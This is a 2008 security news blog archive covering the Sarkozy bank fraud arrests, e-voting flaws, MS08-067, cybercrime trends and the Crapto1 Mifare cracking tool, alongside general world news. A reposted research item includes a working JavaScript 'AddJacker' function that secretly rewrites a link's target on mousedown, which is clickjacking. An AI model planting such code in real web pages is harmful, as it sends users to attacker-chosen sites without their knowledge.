Friday, October 31, 2008

French President Sarkozy Cyber Thieves Nabbed

Via The Inquirer -

The number of arrests made by French coppers investigating theft from President Nicolas Sarkozy's online bank account has risen to six, as three more suspects were nicked on Wednesday.

Sarkozy, keeping a watchful eye on his ‘sous’ during the global financial crisis, called in police when he began noticing small amounts of dosh disappearing from his bank account. It seemed thieves had managed to get hold of Mr Le President’s online banking passwords, and had proceeded to siphon off the cash, hoping he wouldn’t notice.

Apparently the pognon taken from Sarko’s Neuilly suburb Paris account was then used by the arnaquers to top up their mobile phone subscriptions.

Five of the six suspects worked in a mobile phone shop in the French city of Rouen, with two of those arrested yesterday “suspected of having participated knowingly in opening fraudulent phone accounts” according to an AFP source.

The third voyou arrested Wednesday is “suspected of having requested the opening of the accounts,” according to the same source.

A report on French news site Mediapart claimed the Prez’s papa and ex wife were also targeted by the account robbers, making it highly unlikely that the thieves had obtained the account details 'just by chance'.

Still, with Mr Sarkozy’s £195,000-a-year salary, you would think the French President could surrender a bit of his wealth, non?


According to the Time Online UK...

The inquiry, launched last month after it emerged that he had lost €170 from his account, took a new twist when police discovered that Paul Sarkozy de Nagy-Bosca, the President’s father, and Marie-Dominique Culioli, his first wife, were also victims of the fraud.

The discovery blew apart an initial French police theory that the hackers had stumbled upon Mr Sarkozy’s account by chance. "That now seems very unlikely," said a police source.

Detectives from the elite Paris Police Financial Brigade believe he was targeted deliberately, and are attempting to determine why.

Army Adds Fiber-Optic Protection Tool to Approved List

Via -

The Army has added the Interceptor Optical Network Security System to its Information Assurance Approved Product List. Army units and installations worldwide will be able to use Interceptor to protect command and control, intelligence, surveillance and reconnaissance networks, and SCIF facilities.

The new fiber-optic protection technology from
Network Integrity Systems monitors fibers within the cable being protected to detect handling, and can be used in support of the Army’s initiative to deploy SIPRNet to each Brigade Combat Team and to enable network-centric warfare through the Army’s Area Processing Centers.

Networks carrying sensitive or classified government information rely on encryption, hardening or intrusion detection alarms to protect the information from breaches. Unlike traditional intrusion alarms, Interceptor doesn’t rely on an extra optical fiber to sense vibrations. Instead, the system monitors the lit or dark fibers in a network’s fiber cables to detect motion of the cables themselves.

The technology works with any optical cable type and is compatible with all Ethernet standards including 10 Gigabit. Because it is a physical layer device and does not touch the data, unlike encryption, Interceptor does not create any bandwidth bottlenecks. The Interceptor can work with existing networks and new installations.

Interceptor also eliminates the costs associated with hardening – the installation of concrete encasements in the outside plant and rigid metallic carrier inside the building. Additionally, periodic visual inspections, required daily for hardened carrier systems, are eliminated, along with the potential for human error or oversight.

Interceptor has been used across the Defense, Justice and Homeland Security departments.

Intel Budget Disclosure and the Myths of Secrecy

Via FAS Blog -

The Director of National Intelligence today disclosed the 2008 budget for the National Intelligence Program: $47.5 billion. That figure does not include spending for the Military Intelligence Program, which is at least another $10 billion.

The disclosure marks only the fourth time that the intelligence budget has been officially disclosed. The aggregate intelligence budget figure (including national, joint military and tactical intelligence spending) was first released in 1997 ($26.6 billion) in response to a Freedom of Information Act lawsuit filed by the Federation of American Scientists. It was voluntarily released in 1998 ($26.7 billion). The National Intelligence Program budget was next disclosed in 2007 ($43.5 billion), in response to a Congressional mandate, based on a recommendation of the 9/11 Commission. And then there was today’s release for 2008.

In recent years, the most passionate opponent of intelligence budget disclosure has been none other than Sen. Ted Stevens (R-AK), whose own financial non-disclosure practices have recently earned him multiple felony convictions.

In an October 4, 2004 Senate floor debate, Senator Stevens usefully marshaled all of the traditional arguments against disclosure. Most of them were false at the time. Others have since been disproven.

“No other nation, friend, or ally, reveals the amount that it spends on intelligence,” Sen. Stevens said then.

In fact, the United Kingdom, Canada, the Netherlands and other countries have published their intelligence budgets for many years without adverse effect.

“Determining classification is the responsibility and duty of the chief executive of the United States, the President, who is also Commander in Chief,” said Sen. Stevens. “Presidents Truman through Bush has determined that the overall intelligence budget top-line figure is, and shall remain, classified, and I believe we should not overrule that judgment.”

But Congress shares responsibility for defining the terms of the classification system. And as a factual historical matter, President Clinton approved disclosure of the intelligence budget total.

The hoariest myth of all, renewed by Sen. Stevens, is that “This is a slippery slope. Reveal the first number and it will be just a matter of minutes before there will be a call to reveal more information.”

The notion of a “slippery slope” resulting from disclosure of the top-line budget figure has been asserted for decades even by officials who are not convicted felons. But by now, it has been conclusively disproven. Disclosure of the intelligence budget total has not led to uncontrolled further disclosures. The 9/11 Commission’s 2004 recommendation that budgets for “component agencies” should also be disclosed was not accepted and such further disclosures have not occurred despite release of the total figure.

But today the intelligence budget continues to serve as a useful barometer of the incoherence of official secrecy policy. Thus, even after declassifying the FY 2007 intelligence budget figure last year, the Office of the Director of National Intelligence concluded last summer (pdf) that “The size of the National Intelligence Program budget for Fiscal Year 2006 is properly classified.”

It seems unlikely that both positions are correct.

State Department Warns of Possible Identity Theft

Via AP -

The State Department said Friday it has warned nearly 400 passport applicants of a security breach in its records system that may have left them open to identity theft.

The department has so far notified 383 people — most of them in the Washington, D.C. area — that their passport applications containing personal information, including Social Security numbers, may have been illegally accessed and used to open fraudulent credit card accounts, spokesman Sean McCormack said.

More may be notified as an investigation continues, he said, adding that most of those contacted had not been victimized by identity thieves but all have been offered free credit monitoring for a year.

The breach came to light in March around the same time the department was grappling with cases of workers improperly snooping in the passport application files of presidential candidates, celebrities and athletes, McCormack said. However, he said the cases are not related.

The department notified the 383 passport applicants of their potential vulnerability in August and earlier this month while working with Washington police investigating a credit card and identity theft ring, he said.

The ring was exposed after the March arrest of a man found with 19 credit cards in different names and eight completed passport applications. The names of four of those applicants matched those on four of the credit cards, according to documents filed in the U.S. District Court for the District of Columbia.

McCormack declined to comment on how the man obtained the applications, but said at least one State Department worker had been reassigned and might face further disciplinary action pending completion of the investigation.

Following the passport snooping incidents, the department stepped up security for its passport records management, restricting the number of people with access and stepping up mandatory audits and monitoring of the files.


I found this story over on the OSF Data Loss Database. Make sure to check it out, if you haven't already.

Army Intelligence on the Twitter Threat

Via FAS Blog -

Could terrorists use Twitter, the instant messaging and micro-blogging service? Presumably so, just as they could use credit cards and can openers.

The potential use of Twitter and other communications technologies by terrorists is considered in a new draft Army intelligence paper, based on a review of jihadist web sites and other public sources.

The Army paper on “al Qaida-Like Mobile Discussions & Potential Creative Uses” was dissected by Noah Shachtman in “Spy Fears: Twitter Terrorists, Cell Phone Jihadists,” Danger Room, October 24. A copy of the paper itself, which is more like a student exercise than a finished intelligence assessment, is available here (large pdf, for official use only).


Terrorist can also call each other to pass along real-time intelligence....the use of Twitter and other near real-time communication services should be understood.

Twitter is a tool, just like a hammer - it can be used for good or for bad.

Recycled Tapes Yield Data On Former Owners

Via Dark Reading -

The widespread process of erasing data storage tapes and "recertifying" them for sale isn't safe and could cause enterprises to expose sensitive business data, a major tape vendor said yesterday.

Imation, which makes tape cartridges and other storage media, says there's no way to completely erase the data that has been recorded on computer tape.

"Today's tape cartridges have storage capacities of 500 gigabytes or more. Even if 99.9 percent of data is erased from a tape, hundreds of megabytes of potentially sensitive data could remain on the tape," says Subodh Kulkarni, vice president of global commercial business, R&D, and manufacturing at Imation. "This could include thousands of customer names and Social Security numbers."

To prove its point, Imation purchased 100 recertified tapes from mainstream channels and scoped each one to see what data it could find. According to its report, the company found sensitive data from a major U.S. bank -- including employee credit card records, computer user names, and server inventories. It also found detailed patient information from a major U.S. hospital, field research data from a scientific research center, and details on the Human Genome Project from a large university.

"In our lengthy testing and analysis, which has spanned many months, we have confirmed industry guidance that the only way to properly dispose of data is to destroy the media itself," Kulkarni says. "The technical truth is there is no practical and secure way to completely erase and 'recertify' most used tape products."

Imation's conclusions could certainly be seen as self-serving, since the company loses dollars to the recertified tape market every day. But other studies, including one published several years ago by Computer Technology Review, have arrived at similar conclusions. Several other tape storage vendors, including Maxell and FujiFilm, have published similar studies.

Graham Media, one of many vendors that sells recertified tapes, asserts that the risk of buying recycled media is negligible. "Any data that remains on the tape is not usable/readable, much in the same way that old unreadable data resides in every overwritten tape cartridge in every data center in the world," the company said in a written response to tape vendors' warnings about recertified media.

Nuclear Missile Silo Fire Went Undetected, Burned Out After Several Hours

Via -

DENVER - A fire caused $1 million worth of damage at an unmanned underground nuclear launch site last spring, but the Air Force didn't find out about it until five days later, an Air Force official said Thursday.

The May 23 fire burned itself out after an hour or two, and multiple safety systems prevented any threat of an accidental launch of the Minuteman III missile, Maj. Laurie Arellano said. She said she was not allowed to say whether the missile was armed with a nuclear warhead at the time of the fire.

Arellano said the Air Force didn't know a fire had occurred until May 28, when a repair crew went to the launch site — about 40 miles east of Cheyenne, Wyo., and 100 miles northeast of Denver — because a trouble signal indicated a wiring problem.

She said the flames never entered the launch tube where the missile stood and there was no danger of a radiation release.

The fire, blamed on a faulty battery charger, burned a box of shotgun shells, a shotgun and a shotgun case that were kept in the room, Arellano said. A shotgun is a standard security weapon at missile silos.

Arellano said the battery chargers at all U.S. missile launch site have been replaced.

She said the incident wasn't reported sooner because of the complexity of the investigation.

The damage from the fire was estimated at $1 million, including the cost of replacing damaged equipment and cleanup.


That is one expensive shotgun...

Clickjacking Technique Using the 'onmousedown' Event

Via BreakingPoint Labs Blog -

A few weeks ago, Tod Beardsley wrote about (not) 'clickjacking' here on the BreakingPoint Systems blog. He covered a number of techniques to accomplish generating a 'popup' window without triggering any of the traditional popup protections that some browsers feature. The idea was essentially to cause the user to 'request' the popup, thus making it legitimate in the eyes of the browser. Later, he covered his speculation on the 'real clickjacking' attack, which didn't use JavaScript at all but rather did some interesting CSS overlay trickery to hijack a link out from under the user as they clicked on it.

During some research that I was recently performing that I'll likely post about a little later, I discovered another technique that's a bit of a middle-ground between the two methods that Tod was discussing in his blog posts. He came close to this one with his hooking of the 'onmouseup' event, however he was having it spawn a completely new window (the popup) in addition to following the link rather than 'jacking the click' and sending it somewhere entirely different. This is essentially the same type of event hooking technique, but it is used to accomplish actual replacement of the link's target URL.

The following JavaScript function accepts as arguments a link object such as you would find in the document object's links array and a URL that you want to override the original link's URL with:

function AddJacker(link, url) {
if ( link.addEventListener ) {
link.addEventListener("mousedown", function(e){link.href=url;}, false);
} else if ( link.attachEvent ) {
link.attachEvent("onmousedown", function(e){link.href=url;});
} else {
var oldhandler = link["onmousedown"];
if ( oldhandler ) {
link["onmousedown"] = function(e){oldhandler(e);link.href=url;};
} else {
link["onmousedown"] = function(e){link.href=url;};

What this essentially does is create an event handler for the 'onmousedown' event for the target link. When the user clicks on the link, the 'onmousedown', 'onclick', and 'onmouseup' events are fired. Since the 'onmousedown' event happens first, the event handler is called which replaces the link object's href value with the new target URL, which happens before the user is sent on their way to that link's target URL.

The interesting bit about this technique in comparison to the 'onmouseup' technique that Tod was using is that it doesn't result in the user both going to the original target as well as the new target; they are only redirected to the new target, completely overriding the original target. Like Tod's technique, because the new target URL is hiding in a function that is handling the 'onmousedown' event, a mouseover of the link in the browser indicates that it is still targeting the link's original URL. The replacement of the URL doesn't happen until the user actually clicks on the link.

Drobo Storage Solution - BeyondRAID

The safe, expandable Drobo™ storage solution protects your data against a hard drive crash, yet can expand dynamically at any time in just seconds. With nothing to configure or manage, Drobo is now the ideal solution for primary storage as well as backup.

Thursday, October 30, 2008

EstDomains Update: Notice of Termination Stayed

Via -

On 28 October 2008, ICANN sent a notice of termination to EstDomains [PDF, 76K]. Based on an Estonian Court record, ICANN has reason to believe that the president of EstDomains, Vladimir Tsastsin, was convicted of credit card fraud, money laundering and document forgery on 6 February 2008.

Pursuant to Section 5.3 of the Registrar Accreditation Agreement (RAA), ICANN may terminate the RAA before its expiration when, “Any officer or director of [a] Registrar is convicted or a felony or of a misdemeanor related to financial activities, or is adjudged by a court to have committed fraud or breach of fiduciary duty, or is the subject of judicial determination that ICANN deems as the substantive equivalent of any of these; provided such officer or director is not removed in such circumstances.”

ICANN received a response from EstDomains regarding the notice of termination. [PDF, 853K] To assess the merits of the claims made in EstDomains’ response, ICANN has stayed the termination process as ICANN analyzes these claims.

ICANN’s records indicate that EstDomains has approximately 281,000 domain names under its management. ICANN will take all reasonable measures to protect the interests of registrants during the stay period and the subsequent termination process that may follow. For information regarding ICANN’s De-Accredited Registrar Transition Procedure, please go to: [PDF, 119K].

Intel Report: Iran Plans Secret Nuclear Experiments

Via Yahoo! News -

VIENNA, Austria – Iran has recently tested ways of recovering highly enriched uranium from waste reactor fuel in a covert bid to expand its nuclear program, according to an intelligence assessment made available to The Associated Press.

The intelligence, provided by a member of the 145-nation International Atomic Energy Agency, also says a report will soon be submitted to the Iranian leadership for a decision on whether to go ahead with the project.

The alleged tests loosely replicate Saddam Hussein's attempts to build the bomb nearly two decades ago. But experts question the conclusion by those providing the intelligence that Tehran, too, is trying to reprocess the fuel to make a nuclear weapon.

They note that the spent fuel at issue as the source of the enriched uranium is not enough to yield the approximately 30 kilograms (65 pounds) of weapons-grade material needed for a bomb.

Still, they say that the alleged experiment appears plausible — if not as a fast track to weapons capability then as a step that could move it further along that path.

With Iran's nuclear program already under international scrutiny, any new efforts by Tehran to increase its nuclear expertise and its store of enriched uranium would set off alarm bells — particularly if that stock was highly enriched. The higher the enrichment the easier it is to reach the 90 percent level used in the fissile core of nuclear warheads.

The 3-page intelligence report, drawn from Iranian sources within the country, says the source material would be highly enriched — some at above 90 percent, the rest at 20 percent.

In contrast, Iran's enrichment program under constant IAEA monitoring has churned out material that is less than 5 percent enriched, in line with the fuel needs of modern reactors.

"Procedures were evaluated for recycling fuel by dissolving fuel rods" for irradiated waste and then reprocessing the material into uranium metal, says the intelligence assessment. Uranium metal is used for nuclear warheads.

"Sufficient data was collected for planning production lines for recovering the fuel," says the assessment, which gave Tehran's Jaber ibn Hayan Laboratories, run by the Atomic Energy Organization of Iran, as the location for the experiment.

Top officials of AEOI are "in the final stages" of writing a report for the Iranian leadership for assessment on whether to go forward with reprocessing, according to the intelligence.

The laboratories and the Tehran Nuclear Research Center, the site of the reactor, have figured in suspect experiments, including clandestine plutonium separation attempts uncovered by the IAEA.

If the information is accurate then Iran is "trying to get their nose in the tent" of reprocessing material potentially suitable for a warhead, said David Albright, whose Washington-based Institute for Science and International Security tracks suspect secret proliferators.

"On the surface it may have nothing to do with making a bomb, but in the end that's what it could be about."

Israeli Hacker 'The Analyzer' Indicted in New York

Via Wired -

Israeli hacker Ehud "The Analyzer" Tenenbaum was indicted Tuesday by a federal grand jury in Brooklyn on felony charges of conspiracy and fraud.

Between Feb. 2008 and May 2008 Tenenbaum and others engaged in a scheme to initiate transactions on account numbers belonging to other people, "to receive payment and other things" with an aggregate value of more than $1,000, the indictment charges (.pdf).

The U.S. attorney's office in New York did not immediately respond to a call for comment.

Tenenbaum (shown at right in an old photo) achieved worldwide notoriety as a teenager in 1998, when he was caught pulling off a series of recreational intrusions into Pentagon computers, in an investigation the Defense Department code named "Solar Sunrise."

Harvard Professor Offers New Challenge to RIAA

Via ComputerWorld -

A Harvard law professor has opened a new front in the battle between the Recording Industry Association of America (RIAA) and alleged music pirates by challenging the constitutionality of a statute being used by the industry group to bring lawsuits against alleged copyright violators.

The case involves an individual named Joel Tenenbaum, who was sued by the RIAA for allegedly illegally copying and distributing copyrighted songs belonging to several music labels. The lawsuit was filed in U.S. District Court in Boston in August 2007 after what the music labels claimed was more than two years of effort trying to get Tenenbaum to accept a settlement involving an undisclosed amount.

The music labels claimed to have discovered more than 800 copyrighted songs stored on a shared folder in Tenenbaum's computer, though only seven of those songs are specified in the case.

Harvard Law School professor Charles Nesson this week filed a counterclaim on behalf of Tenenbaum, challenging both the constitutionality of the Digital Theft Deterrence and Copyright Damages Improvement Act of 1999 and the music labels' use of it against Tenenbaum. The claim is notable because it is broader than previous challenges related to the constitutionality of the RIAA's antipiracy campaign.

Nesson's move adds to the growing number of challenges being thrown at the RIAA's campaign from several quarters. Most of the recent ones have focused on the industry group's use of a company called MediaSentry Inc. to gather evidence against alleged copyright violators. Several groups, including the Massachusetts State Police, Oregon's attorney general and Central Michigan University in Mount Pleasant, have called MediaSentry an unlicensed private investigator that is unlawfully collecting information on behalf of the RIAA.

In his motion, Nesson argued that the statute was essentially a criminal statute, and that it was unconstitutional to apply the law to prosecute a civil case in federal court, which is where previous RIAA lawsuits have been argued. He sought damages on behalf of Tenenbaum for what he claimed was the RIAA's abuse of process in pursuing the case.

He also challenged the constitutionality of the steep penalties for copyright violations that are provided under the act. The penalties range from $750 to $30,000 per infringement, with a maximum of $150,000 for certain willful violations. Last year, Jammie Thomas was ordered by a federal jury in Duluth, Minn., to pay $220,000 to six music companies for illegally downloading and sharing copyrighted music over a peer-to-peer network.

Nesson argued that such fines are "grossly excessive" and far beyond the rational measure of any financial damage that may have been caused by Tenenbaum's alleged piracy.

Does Anyone Expect Apple’s Ads to be Truthful?

Via ZDNet -

I’ll be honest with you, I find most of Apple’s ads to be funny. However, I don’t expect them to be truthful.

For example, take Bean Counter, one of Apple’s latest 30 second TV/web ads which pokes fun at Microsoft’s ad spending (kinda ironic, don’t you think, bringing out an ad to criticize another company’s ad spending).

It turns out that the premise of this ad (that Microsoft spends more money on ads than it does on R&D) is totally bogus. In fact, it’s a lie. The truth is that Apple spends far less on R&D than Microsoft does, and for the 2007 financial year Apple was only spending 0.7 cents less on advertising that Microsoft was:

For each $1 of sales Apple spends:

- 1.9 cents on Advertising
- 3.3 cents on R&D

For each $1 of sales Microsoft spends:

- 2.6 cents on Advertising
- 13.9 cents on R&D

Apple ads are an example of what Apple does best - create a reality distortion field that relies on twisting the facts to fit in with what the Mac crowd (and now the anti-Vista crowd) want to hear. The latest ads prove this by not featuring or even mentioning any Apple products throughout the course of the ad.

Apple ads are successful because they manage to get people to drop their guard. It’s just like going on a tour of a haunted house because you’re willing to suspend belief and let all the garbage and drivel wash over you just for a little entertainment.

Compare Apple’s negative spin ads to Microsoft’s ads, which are vague and overall unfunny, and chooses to push “Windows” and “I’m a PC” rather than the Vista brand. Maybe Microsoft could spice up its ads with a few lies.

Bomb Attacks in India Kill at Least 67

Via NYTimes -

NEW DELHI — A series of apparently synchronized explosions tore through four towns in the troubled state of Assam in northeastern India on Thursday, killing at least 67 people and leaving more than 210 wounded, according to witnesses and police.

The bombs targeted crowded markets and government buildings like courts and police stations, witnesses said. The attacks, among the bloodiest in recent months, left streets littered with bodies and the wreckage of cars and motorcycles, according to witnesses and photographers at the scene.

There were no immediate reports that any group had taken responsibility for the bombings.

For many years, Assam state has been riven by a separatist insurgency led by the United Liberation Front of Assam, which demands independence for the region of some 26 million people and is often blamed by the authorities for bombings. Last month, ethnic clashes left 57 people dead in the area when indigenous Bodos fought with Bengali-speaking Muslims.

According to witnesses and the police, at least nine blasts rocked the four towns attacked on Thursday, including three in the state capital, Guwahati. One of the bombs there had been left in the parking lot of the district court.

Thousands of Syrians Protest US Raid

Via VOA News -

The Syrian government appears to have mobilized tens of thousands of people, busing them in to Damascus from far-flung corners of the country. They were demonstrating against an American raid in eastern Syria, which the United States says targeted and killed a top al-Qaida operative. Edward Yeranian reports for VOA from Cairo.

Syrian government television showed images of tens of thousands of demonstrators, waving banners and shouting slogans in support of President Bashar al Assad, in what appeared to be a mostly peaceful, government-sponsored protest of a raid in eastern Syria, widely believed to be conducted by the United States. The United States has not formally acknowledged involvement.

The American Embassy in Damascus was closed, for safety reasons. Hundreds of armed Syrian riot police surrounded the building to keep demonstrators away. The U.S. Cultural Center, as well as the American Community School were also closed for the day.

Syria's official news agency, SANA, quotes Deputy Foreign Minister Faisal al Miqdad as saying that Damascus is awaiting official explanation from the United States and Iraqi governments on what he calls an unacceptable violation of Syrian sovereignty.

Unconfirmed reports say that Damascus has asked the United States to close its embassy, the U.S. Cultural Center and the American School by next week.

Crypto Hash Algorithm Competition Set to Begin

Via Network World -

Security experts vying to have their technology selected as the next cryptographic-hash algorithm standard for the U.S. government need to submit their entries this week. Then they will have a long wait ahead: The new Secure Hash Algorithm standard isn't expected to be chosen until 2012.

A cryptographic hash algorithm is a marvel of ingenuity, allowing functions such as digital signatures, content verification and other security processes, including malware scanning. The current Secure Hash Algorithm (SHA) variants SHA-1 and SHA-2 aren't yet thought to be broken, but serious attacks against their core have been known for some time. With an eye on finding a better crypto hash algorithm, the National Institute of Standards and Technology (NIST) last year announced it's holding a competition to review public entries for a hoped-for new standard.

One contender, which was disclosed today, is "Skein," developed by Bruce Schneier with colleagues Niels Ferguson, Stefan Lucks, Doug Whiting, Mihir Bellare, Tadayoshi Kohno, Jon Callas and Jesse Walker.

Working together as friends, these security experts have jobs at Microsoft, Bauhaus-Universitat Weimar, BT Group, Hifn, the University of California, the University of Washington, PGP and Intel.

Although Skein may look like something from some "powerful industry consortium," its creators point out in their 75-page document submission that this is not the case.

"Our employers have kindly agreed to let us do this work, but most of it was done on our own time," Skein's creators say. "Really, they have only the vaguest idea what we're doing." The Skein collective adds: "We had lots of fun."

Skein "is really fast, really flexible," says Schneier, chief security technology officer of BT Group. "It's really simple and secure."

The Skein algorithm family works from 256-bit to 1,024-bit in strength, 512-bit representing the primary proposal. "Skein-256 is our low-memory variant," the Skein document states, while "Skein-1024 is our ultra-conservative variant." The block cipher at the core of Skein is called Threefish.

Programming Tools for Cracking Mifare Published

Via Heise Security -

A hacker using the pseudonym Bla has published an open source tool called Crapto1 for cracking the encryption of the Mifare Classic RFID chip, as used in the Oyster Card. Besides an implementation in C of the vulnerable Crypto1 algorithm, the archive also contains the C source code for an attack that has been described in a paper by Dutch security researchers at Radboud University.

Using the tool it is said to be possible to calculate the access code of a Mifare Classic card within around two seconds. All an attacker requires is a live recording of an encrypted radio communication between the card and a legitimate reader, as well as a little programming knowledge. The access code then allows him not only to decode the encrypted data, but also to manipulate the card's content virtually without limit and to clone it to obtain services fraudulently.

Wednesday, October 29, 2008

Georgia Accused of Targeting Civilians

Via BBC -

The BBC has discovered evidence that Georgia may have committed war crimes in its attack on its breakaway region of South Ossetia in August.

Eyewitnesses have described how its tanks fired directly into an apartment block, and how civilians were shot at as they tried to escape the fighting.

Research by the international investigative organisation Human Rights Watch also points to indiscriminate use of force by the Georgian military, and the possible deliberate targeting of civilians.

Indiscriminate use of force is a violation of the Geneva Conventions, and serious violations are considered to be war crimes.

The allegations are now raising concerns among Georgia's supporters in the West.

British Foreign Secretary David Miliband has told the BBC the attack on South Ossetia was "reckless".

He said he had raised the issue of possible Georgian war crimes with the government in Tbilisi.

The evidence was gathered by the BBC on the first unrestricted visit to South Ossetia by a foreign news organisation since the conflict.

Georgia's attempt to re-conquer the territory triggered a Russian invasion and the most serious crisis in relations between the Kremlin and the West since the Cold War.

And Georgians themselves have suffered. We confirmed the systematic destruction of former Georgian villages inside South Ossetia.

Some homes appear to have been not just burned by Ossetians, but also bulldozed by the territory's Russian-backed authorities.

The war began when Georgia launched artillery attacks on targets in the South Ossetian capital, Tskhinvali, at about 2330 on 7 August 2008.

Georgia said at the time that it was responding to increasing attacks on its own villages by South Ossetia militia, although it later said its action was provoked by an earlier Russian invasion.


The Russian prosecutor's office is investigating more than 300 possible cases of civilians killed by the Georgian military.

Some of those may be Ossetian paramilitaries, but Human Rights Watch believes the figure of 300-400 civilians is a "useful starting point".

That would represent more than 1% of the population of Tskhinvali - the equivalent of 70,000 deaths in London.

Allison Gill, director of the Moscow office of Human Rights Watch, said: "We're very concerned at the use of indiscriminate force by the Georgian military in Tskhinvali.

"Tskhinvali is a densely populated city and as such military action needs to be very careful that it doesn't endanger civilians."

"We know that in the early stages there were tank attacks and Grad rockets used by Georgian forces," she added.

Cybercrime is Recession-Proof

Via Dark Reading -

One industry sector is actually happy about the current state of the global economy: cybercriminals.

"One thing we've seen is financially based cybercrime is recession-proof," says Darren Mott, supervisory special agent for the FBI's Cyber Division. "With [this] changing economy, the only thing that changes is the way they go about obtaining their information."

Organized cybercrime has already begun capitalizing on the global financial crisis, cybercrime experts say, with targeted phishing attacks on customers whose banks have folded, and attacks that scam consumers who may be shopping less online, but are now spending more time at home. With fewer business and consumer targets available, the bad guys are redirecting their efforts to adapt to the market. For example, credit cards are out; debit cards are in.

"The crisis is good for cybercrime because people become more desperate for 'good deals.' It is bad for cybercrime in that they will continue operations much like they do now, but have to move around more often," says security expert Gadi Evron.

And they are already on the move: A wave of targeted phishing attacks on doomed banks and brokerages has been spotted by The Shadowserver Foundation during the past few weeks. "They were crafted a little better, mentioning the affected banks," as well as some that posed as the Better Business Bureau, says Andre' DiMino, co-founder and director of Shadowserver. "They are almost preying on how people are trying to be more savvy in what they buy and what they are doing as they are more careful in where they spend."

One attack used Citigroup's attempted takeover of Wachovia as a premise for stealing Wachovia customers' credentials. (Wells Fargo eventually outbid Citigroup for Wachovia). "There's been a surge in phishing, telling customers that due to the new takeover, they need new credentials," says Ori Eisen, founder and chief innovation officer for 41st Parameter. If the victim hands over his old credentials to "set" his new ones, it's game over for his bank account information.


In the past two months, researchers at Finjan have found three times the number of servers with stolen data. "Before that, we'd see five or six servers in a single month, or one every week or so. Now we're seeing four or five servers a week," says Yuval Ben-Itzhak, CTO of Finjan. "Increased phishing attacks might be the reason, and a combination of both corporate and consumer [victims]."

Other researchers have cited a direct correlation between the stock market's nosedive and an increase in cybercrime activity. (See related story, Security Weathering Economic Storm.) Ryan Sherstobitoff, chief corporate evangelist for PandaLabs says he and his team first noticed a jump in overall malware on Sept. 16 when stocks started to dip significantly. Panda discovered a 5 to 30 percent increase in malware that day related to the recent wave of rogue antivirus adware attacks. "If the stock market is crashing, there's not a lot of confidence," Sherstobitoff says. And phony antivirus popups warning that your system-may-be-infected-so-you'd-better-run-this-scan preyed on fears, he says.

Meanwhile, law enforcement and cybercrime experts say more malicious Web sites posing as economic or financial advisory services will start to emerge in this jittery financial climate. "'Have you been victimized by your bank's closing? Check us out,'" is the type of lure the bad guys may use with these sites, DiMino says.

That means a reverse in the trend from the past few months of cybercriminals' silently infecting legitimate sites. "Expect to see malicious sites crop up that are geared to information-stealing, malware-dropping, pharming, and phishing rather than compromising legitimate site," he says.

And just as street crime increases in times of financial stress, more novice attackers and script kiddies are likely to perform an online version of shoplifting and bank robbery. "You're going to see more quick-hit script kiddies, like street crime," DiMino says.


The insider threat, too, will likely also intensify as layoffs spread in the corporate world. "You're going to see insider attacks and less direct hacks," Shadowserver's DiMino says. "There will be more of an attempt to infiltrate from inside, with botnets and SQL injection."

With potentially fewer overall enterprise targets, cybercrime organizations could end up fighting over turf. "In general, cybercrime is nothing more than a new form of organized crime," the FBI's Mott says. "You may see more online cybercrime 'violence.' DDoS attacks may go up."

Still, the bottom line is that the crisis hasn't hurt the cybercriminal's bottom line. Nor has it slowed any activity in the bustling online black market, at least thus far. "Right now, there's no observable effect. We still see the same trading activity on IRC channels," says Guillaume Lovet, senior manager for Fortinet's Threat Response Team.


This is one of the primary reasons why security-related jobs fair better during hard economic times. We are not recession-proof by any means. I have seen several of my friends take a hit during the last year. But compared to many other job types, we ride the waves better.

But, in the end, companies just can't afford not to be secure...literally.

E-voting Fears Run High as Election Day Looms

The Register UK -

With just a week to go before the US presidential election, academics, politicians, and voters are voicing increased distrust of the electronic voting machines that will be used to cast ballots.

In early balloting in West Virginia, Texas, and Tennessee, voters using e-voting machines made by Nebraska-based Election Systems & Software (ES&S) have reported the "flipping" of their vote from the presidential candidate they selected to the candidate's rival. In some cases, voters said their choice had been changed from Democrat Barack Obama to Republican John McCain while others reported just the opposite.

The reports prompted the Brennan Center for Justice and a group called Verified Voting on Tuesday to write voting officials in 16 states where the ES&S iVotronic machine is used to be on the lookout for problems.

"There is a real chance that voters using iVotronic machines in your state will experience 'vote flopping' similar to that experienced by voters in West Virginia," the letter warned. It went on to urge poll workers to recalibrate machines when in doubt, and when possible to confirm voters' candidate choices with a verified paper trail.

The vote flipping warning comes on the heels of a 158-page report (PDF) computer scientists from Princeton University released two weeks ago warning of serious deficiencies in another commonly used e-voting machine. The Sequoia AVC Advantage 9.00H touch-screen voting machine, made by California-based Sequoia Voting Systems, is "easily hacked" in about seven minutes by replacing a single read-only memory chip or swapping out a separate processor chip.

The findings have prompted one candidate for the mayor of Bayonne, New Jersey, to ask the state's secretary of state to oversee the town's municipal election.

The study was ordered by a New Jersey judge who is presiding over a lawsuit challenging the use of e-voting machines in that state. Plaintiffs in the case argue the machines don't meet election law requirements for accuracy. State officials counter that they do.

ES&S has strongly refuted (PDF) the report, saying the researchers, among other things, improperly removed security seals and hardware before conducting their tests.

Even far from the nation's heartland, there were still more reports of botched e-voting. Finland's Ministry of Justice said Tuesday that about 2 percent of votes cast in an election held Sunday could not be counted because voters hadn't followed instructions. The machines, developed by IT services group TietoEnator, required voters to press a button marked OK twice before removing a smart card from the machine terminal. Voters who failed to do so were unable to cast their ballots.

New Windows Bug (MS08-067) Differs from 2006 Flaw

Via NYTimes -

Contrary to speculation, the bug Microsoft patched unexpectedly last week is not closely related to one the company fixed more than two years ago, a company security expert said Monday.

The vulnerability in the Windows Server service that Microsoft patched with an "out-of-cycle" fix last Thursday is unrelated to another hole in the same service that the company plugged with a patch in August 2006, said Michael Howard , a principal security program manager with the company.

Howard, perhaps best known for co-authoring the book Writing Secure Code , works in the Security Development Lifecycle (SDL) group at Microsoft; SDL is also the company's name for the process it uses to generate more secure software.

"I spent a good chunk of the morning going over the analysis [of the bugs]," said Howard at mid-day Monday. "The two bugs are actually quite different. Although the effect is the same, the way you pull off an exploit is very different."

The two vulnerabilities are so different, he added, that it was no surprise that company developers didn't find the most recent one when they looked at the Windows Server service code two years ago. "[This one] is a really hard bug to spot," Howard said.

Microsoft patched the Windows Server service in August 2006's MS06-040 . Like the one posted Thursday , that bulletin calls out the remote procedure call (RPC) code in the service as the location of the bug.

To back up his claim that the newest flaw is easy to overlook, Howard cited a Twitter message three days ago from Alexander Sotirov, a noted independent security researcher. "I had the vulnerable function decompiled and fully commented back in 2006 when I was reversing MS06-040, but I just didn't see the bug," said Sotirov , who was one of a pair of researchers who helped Shane Macaulayhack Windows Vista SP1 during a March contest.

